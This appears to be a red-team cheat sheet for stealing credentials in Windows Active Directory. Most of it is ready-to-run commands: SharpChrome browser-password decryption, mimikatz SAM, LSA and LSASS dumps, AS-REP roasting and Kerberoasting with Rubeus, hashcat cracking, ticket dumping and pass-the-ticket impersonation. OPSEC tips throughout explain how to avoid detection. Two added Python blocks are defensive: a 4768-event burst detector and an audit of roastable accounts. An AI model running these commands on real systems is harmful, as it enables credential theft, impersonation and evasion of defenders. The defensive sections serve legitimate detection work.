# Credentials

***

## Browser Credentials

SharpChrome can read and decrypt saved browser credentials. It works from a **medium-integrity** context.

```
execute-assembly C:\Tools\SharpDPAPI\SharpChrome\bin\Release\SharpChrome.exe logins
```

***

## Windows Credential Manager

Windows Credential Manager stores saved credentials, such as those for RDP connections. This works from a **medium-integrity** context.

```
# Enumerate saved credentials
execute-assembly C:\Tools\Seatbelt\Seatbelt\bin\Release\Seatbelt.exe WindowsVault

# Decrypt via DC using DPAPI backup key
execute-assembly C:\Tools\SharpDPAPI\SharpDPAPI\bin\Release\SharpDPAPI.exe credentials /rpc
```

***

## OS Credential Dumping

> **OPSEC WARNING:** Avoid dumping credentials from LSASS. Security drivers use `ObRegisterCallbacks` to detect handles to LSASS.

### Logon Passwords (AVOID)

```
# DO NOT DO THIS - triggers detections
mimikatz sekurlsa::logonpasswords
```

Crack NTLM with hashcat mode 1000:

```bash
hashcat -a 0 -m 1000 ntlm.hash wordlist.txt -r rules/dive.rule
```

### Kerberos Encryption Keys (AVOID)

```
# DO NOT DO THIS - triggers detections
mimikatz sekurlsa::ekeys
```

**Note:** Mimikatz incorrectly labels hashes as `des_cbc_md4`. Check the hash length to identify the actual type:

* 64 chars = `aes256-cts-hmac-sha1-96`
* 32 chars = `aes128-cts-hmac-sha1-96` or `rc4_hmac`

Crack AES256 with hashcat mode 28900:

```bash
# Format: $krb5db$18$<username>$<DOMAIN-FQDN>$<hash>
hashcat -a 0 -m 28900 aes256.hash wordlist.txt -r rules/dive.rule
```

### SAM Database (SAFE)

Does **not** touch LSASS - safe to run.

```
# High integrity (not SYSTEM)
mimikatz !lsadump::sam

# SYSTEM context
mimikatz lsadump::sam
```

### LSA Secrets (SAFE)

LSA secrets contain service account passwords, the machine account password, and EFS keys.

```
# High integrity (not SYSTEM)
mimikatz !lsadump::secrets

# SYSTEM context
mimikatz lsadump::secrets
```

### Cached Domain Credentials

MSCacheV2 hashes - slow to crack.

```
mimikatz lsadump::cache
```

***

## AS-REP Roasting

> **OPSEC WARNING:** Each AS-REP generates a 4768 event. Don't roast the whole domain.
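
From the defender's side, the 4768 events mentioned in the warning can be filtered for TGTs issued without pre-authentication and grouped by source. This is an added example, not part of the original page; the sample events, addresses, account names other than `oracle_svc`, and the window and threshold values are constructed assumptions.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed 4768 records; keys follow the event's data field names.
FIELDS = ("time", "TargetUserName", "PreAuthType", "TicketEncryptionType", "Status", "IpAddress")
SAMPLE_4768 = [
    ("2024-05-01T10:00:01", "jdoe",       "2", "0x12",       "0x0", "::ffff:10.0.0.21"),
    ("2024-05-01T10:02:10", "oracle_svc", "0", "0x17",       "0x0", "::ffff:10.0.0.50"),
    ("2024-05-01T10:02:12", "svc_backup", "0", "0x17",       "0x0", "::ffff:10.0.0.50"),
    ("2024-05-01T10:02:15", "svc_web",    "0", "0x17",       "0x0", "::ffff:10.0.0.50"),
    ("2024-05-01T10:03:00", "nosuchuser", "-", "0xffffffff", "0x6", "::ffff:10.0.0.50"),
    ("2024-05-01T11:30:00", "legacy_app", "0", "0x12",       "0x0", "::ffff:10.0.0.77"),
]
EVENTS = [dict(zip(FIELDS, row)) for row in SAMPLE_4768]


def tgts_without_preauth(events):
    """Successful AS exchanges (Status 0x0) where no pre-auth was supplied (PreAuthType 0).

    Each hit is annotated with rc4=True when the ticket used etype 0x17 (RC4-HMAC).
    """
    return [dict(e, rc4=(e["TicketEncryptionType"].lower() == "0x17"))
            for e in events
            if e["Status"].lower() == "0x0" and e["PreAuthType"] == "0"]


def bursts_by_source(hits, window=timedelta(minutes=5), min_accounts=3):
    """Sources that got no-pre-auth TGTs for >= min_accounts distinct users within one window."""
    by_src = defaultdict(list)
    for e in hits:
        by_src[e["IpAddress"]].append((datetime.fromisoformat(e["time"]), e["TargetUserName"]))
    flagged = {}
    for src, seen in by_src.items():
        seen.sort()
        for start, _ in seen:
            users = {u for t, u in seen if timedelta(0) <= t - start <= window}
            if len(users) >= min_accounts:
                flagged[src] = sorted(users)
                break
    return flagged


if __name__ == "__main__":
    hits = tgts_without_preauth(EVENTS)
    for e in hits:
        print(e["time"], e["TargetUserName"], e["IpAddress"], "RC4" if e["rc4"] else "other etype")
    print("bursts:", bursts_by_source(hits))
```

Every hit is worth reviewing on its own, since a TGT issued without pre-authentication means the account has pre-auth disabled; the burst check only ranks sources that touched several such accounts.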

### Enumerate Vulnerable Users First

```
# Find users with pre-auth disabled
ldapsearch (&(samAccountType=805306368)(userAccountControl:1.2.840.113556.1.4.803:=4194304)) --attributes cn,samaccountname,serviceprincipalname
```

### Roast Specific User

```
# Target specific account only
execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe asreproast /user:oracle_svc /format:hashcat /nowrap
```

### Crack Hash

```bash
hashcat -a 0 -m 18200 asrep.hash wordlist.txt -r rules/dive.rule
```

***

## Kerberoasting

> **OPSEC WARNING:** Don't roast every SPN. Triage targets first.

### Enumerate SPNs First

```
execute-assembly C:\Tools\ADSearch\ADSearch\bin\Release\ADSearch.exe -s "(&(samAccountType=805306368)(servicePrincipalName=*)(!samAccountName=krbtgt)(!(UserAccountControl:1.2.840.113556.1.4.803:=2)))" --attributes cn,samaccountname,serviceprincipalname
```
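
The two LDAP filters above (pre-auth disabled, and enabled user accounts with an SPN) can be run by defenders as an exposure audit. This added example, not part of the original page, reproduces their logic in Python over a constructed directory export, including the bitwise-AND matching rule `1.2.840.113556.1.4.803`; every account except `oracle_svc` and `mssql_svc` is made up.

```python
# userAccountControl flags and sAMAccountType values as documented by Microsoft.
ACCOUNTDISABLE = 0x2          # 2: mask in the SPN filter's negated clause
DONT_REQ_PREAUTH = 0x400000   # 4194304: mask in the pre-auth filter
SAM_USER_OBJECT = 805306368   # normal user accounts (computer accounts are 805306369)

# Constructed directory export (assumption: one dict per account, SPNs as a list).
ACCOUNTS = [
    {"sAMAccountName": "jdoe", "sAMAccountType": 805306368, "userAccountControl": 512,
     "servicePrincipalName": []},
    {"sAMAccountName": "oracle_svc", "sAMAccountType": 805306368, "userAccountControl": 4194816,
     "servicePrincipalName": []},
    {"sAMAccountName": "mssql_svc", "sAMAccountType": 805306368, "userAccountControl": 66048,
     "servicePrincipalName": ["MSSQLSvc/ilf-sql-1.inlanefreight.local:1433"]},
    {"sAMAccountName": "old_svc", "sAMAccountType": 805306368, "userAccountControl": 514,
     "servicePrincipalName": ["HTTP/old.example.internal"]},
    {"sAMAccountName": "krbtgt", "sAMAccountType": 805306368, "userAccountControl": 514,
     "servicePrincipalName": ["kadmin/changepw"]},
    {"sAMAccountName": "WS01$", "sAMAccountType": 805306369, "userAccountControl": 4096,
     "servicePrincipalName": ["HOST/WS01"]},
]


def bit_and(value, mask):
    """LDAP_MATCHING_RULE_BIT_AND: matches only when every bit of mask is set in value."""
    return value & mask == mask


def audit_roastable(accounts):
    """Return the accounts each of the page's two filters would match."""
    findings = {"preauth_disabled": [], "user_with_spn": []}
    for a in accounts:
        if a["sAMAccountType"] != SAM_USER_OBJECT:
            continue  # both filters are scoped to user objects
        name, uac = a["sAMAccountName"], a["userAccountControl"]
        if bit_and(uac, DONT_REQ_PREAUTH):
            findings["preauth_disabled"].append(name)   # fix: re-enable Kerberos pre-auth
        if (a["servicePrincipalName"] and name.lower() != "krbtgt"
                and not bit_and(uac, ACCOUNTDISABLE)):
            findings["user_with_spn"].append(name)      # fix: gMSA or long random password
    return findings


if __name__ == "__main__":
    for finding, names in audit_roastable(ACCOUNTS).items():
        print(f"{finding}: {', '.join(names) or 'none'}")
```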

### Roast Specific SPN

```
# By SPN
execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe kerberoast /spn:MSSQLSvc/ilf-sql-1.inlanefreight.local:1433 /simple /nowrap

# By username
execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe kerberoast /user:mssql_svc /format:hashcat /nowrap
```

### Crack Hash

```bash
hashcat -a 0 -m 13100 kerb.hash wordlist.txt -r rules/dive.rule
```

***

## Extracting Tickets from Memory

> **OPSEC SAFE:** Uses LSA APIs (`LsaCallAuthenticationPackage`) and doesn't open a handle to LSASS.

Requires **high-integrity** to dump other users' tickets.

### Triage Tickets

```
execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe triage
```

Look for tickets whose service is `krbtgt`; these are TGTs.

### Dump Specific Ticket

```
execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe dump /luid:0x2842e6 /service:krbtgt /nowrap
```

### Impersonate User with Ticket

```
# Create sacrificial logon session
execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe createnetonly /program:C:\Windows\notepad.exe /username:tmorgan /domain:INLANEFREIGHT.LOCAL /password:FakePass

# Inject ticket into session
execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe ptt /luid:0x132ef34 /ticket:<base64-ticket>

# Verify
run klist

# Drop impersonation
rev2self
```

***

## Renewing TGTs

TGTs can be renewed every 10 hours until the `RenewTill` date.

### Check Ticket Validity

```
execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe describe /ticket:<base64-ticket>
```

### Renew Ticket

```
execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe renew /ticket:<base64-ticket> /nowrap
```

